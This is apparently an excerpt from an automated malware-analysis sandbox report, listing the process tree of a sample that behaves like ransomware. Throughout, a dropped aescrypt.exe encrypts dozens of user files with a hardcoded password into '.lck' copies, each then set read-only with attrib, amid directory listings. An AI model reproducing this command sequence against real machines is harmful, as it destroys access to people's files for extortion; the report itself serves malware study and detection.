- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "OutGroup.vsdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearMeasure.vdx.lck" "ClearMeasure.vdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ClearMeasure.vdx.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceiveWait.ico.lck" "ReceiveWait.ico"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ReceiveWait.ico.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnregisterOptimize.xps.lck" "UnregisterOptimize.xps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnregisterOptimize.xps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ApproveImport.php.lck" "ApproveImport.php"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ApproveImport.php.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteRename.xlt.lck" "WriteRename.xlt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "WriteRename.xlt.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceInitialize.ppsm.lck" "TraceInitialize.ppsm"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceInitialize.ppsm.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PopRemove.scf.lck" "PopRemove.scf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PopRemove.scf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnlockBlock.lock.lck" "UnlockBlock.lock"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnlockBlock.lock.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertUnprotect.potm.lck" "ConvertUnprotect.potm"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConvertUnprotect.potm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisableDismount.html.lck" "DisableDismount.html"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DisableDismount.html.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UseDisconnect.ppsx.lck" "UseDisconnect.ppsx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UseDisconnect.ppsx.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectSave.vst.lck" "ConnectSave.vst"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectSave.vst.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NewMove.dib.lck" "NewMove.dib"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "NewMove.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RegisterSave.ocx.lck" "RegisterSave.ocx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RegisterSave.ocx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GetLimit.pptx.lck" "GetLimit.pptx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "GetLimit.pptx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InvokeOpen.wdp.lck" "InvokeOpen.wdp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "InvokeOpen.wdp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockResume.xlt.lck" "UnblockResume.xlt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnblockResume.xlt.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceRead.wmv.lck" "TraceRead.wmv"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "TraceRead.wmv.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendExpand.wmf.lck" "SendExpand.wmf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SendExpand.wmf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectApprove.xlsx.lck" "ConnectApprove.xlsx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectApprove.xlsx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RemoveDisconnect.vstx.lck" "RemoveDisconnect.vstx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RemoveDisconnect.vstx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResetWait.css.lck" "ResetWait.css"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ResetWait.css.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StartEnable.shtml.lck" "StartEnable.shtml"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "StartEnable.shtml.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PushClear.mpe.lck" "PushClear.mpe"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PushClear.mpe.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "AddMove.jpg.lck" "AddMove.jpg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "AddMove.jpg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RenameConvertFrom.midi.lck" "RenameConvertFrom.midi"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RenameConvertFrom.midi.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeDismount.DVR-MS.lck" "RevokeDismount.DVR-MS"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RevokeDismount.DVR-MS.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ApproveDisable.nfo.lck" "ApproveDisable.nfo"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ApproveDisable.nfo.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PublishSelect.otf.lck" "PublishSelect.otf"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PublishSelect.otf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SyncConfirm.svg.lck" "SyncConfirm.svg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SyncConfirm.svg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SavePing.vst.lck" "SavePing.vst"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "SavePing.vst.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditWrite.pub.lck" "EditWrite.pub"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "EditWrite.pub.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RecentPlaces.lnk.lck" "RecentPlaces.lnk"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RecentPlaces.lnk.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Desktop.lnk.lck" "Desktop.lnk"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Desktop.lnk.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Downloads.lnk.lck" "Downloads.lnk"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "Downloads.lnk.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupUnpublish.docx.lck" "BackupUnpublish.docx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "BackupUnpublish.docx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertFromDismount.asp.lck" "ConvertFromDismount.asp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConvertFromDismount.asp.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CopyStop.cfg.lck" "CopyStop.cfg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CopyStop.cfg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EnableSelect.vb.lck" "EnableSelect.vb"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "EnableSelect.vb.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditUnprotect.ttc.lck" "EditUnprotect.ttc"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "EditUnprotect.ttc.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MergeLock.pps.lck" "MergeLock.pps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MergeLock.pps.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MergeSkip.exe.lck" "MergeSkip.exe"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MergeSkip.exe.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OptimizeOpen.htm.lck" "OptimizeOpen.htm"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OptimizeOpen.htm.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ProtectBlock.html.lck" "ProtectBlock.html"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ProtectBlock.html.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MountEdit.ex_.lck" "MountEdit.ex_"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "MountEdit.ex_.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutHide.eps.lck" "OutHide.eps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OutHide.eps.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceivePop.shtml.lck" "ReceivePop.shtml"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ReceivePop.shtml.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectAdd.mpp.lck" "ConnectAdd.mpp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ConnectAdd.mpp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DenyApprove.odt.lck" "DenyApprove.odt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DenyApprove.odt.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BlockWait.rar.lck" "BlockWait.rar"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "BlockWait.rar.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "LockSave.wav.lck" "LockSave.wav"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "LockSave.wav.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InstallSet.bin.lck" "InstallSet.bin"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "InstallSet.bin.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PublishUpdate.jpe.lck" "PublishUpdate.jpe"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PublishUpdate.jpe.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "JoinWait.pot.lck" "JoinWait.pot"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "JoinWait.pot.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "HideUnlock.nfo.lck" "HideUnlock.nfo"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "HideUnlock.nfo.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutSuspend.gif.lck" "OutSuspend.gif"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OutSuspend.gif.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutExit.potx.lck" "OutExit.potx"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "OutExit.potx.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnlockJoin.TS.lck" "UnlockJoin.TS"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "UnlockJoin.TS.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestoreReset.cfg.lck" "RestoreReset.cfg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RestoreReset.cfg.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DebugPop.mpeg.lck" "DebugPop.mpeg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DebugPop.mpeg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CheckpointSet.zip.lck" "CheckpointSet.zip"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "CheckpointSet.zip.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestoreRegister.odt.lck" "RestoreRegister.odt"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RestoreRegister.odt.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeDeny.xps.lck" "RevokeDeny.xps"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RevokeDeny.xps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RegisterConvertFrom.wma.lck" "RegisterConvertFrom.wma"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "RegisterConvertFrom.wma.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "LimitDismount.wdp.lck" "LimitDismount.wdp"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "LimitDismount.wdp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisablePing.hta.lck" "DisablePing.hta"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "DisablePing.hta.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PopMerge.mov.lck" "PopMerge.mov"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "PopMerge.mov.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeSave.TS.lck" "ResumeSave.TS"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ResumeSave.TS.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExpandOpen.reg.lck" "ExpandOpen.reg"3⤵
-
C:\Windows\system32\attrib.exeattrib +r "ExpandOpen.reg.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
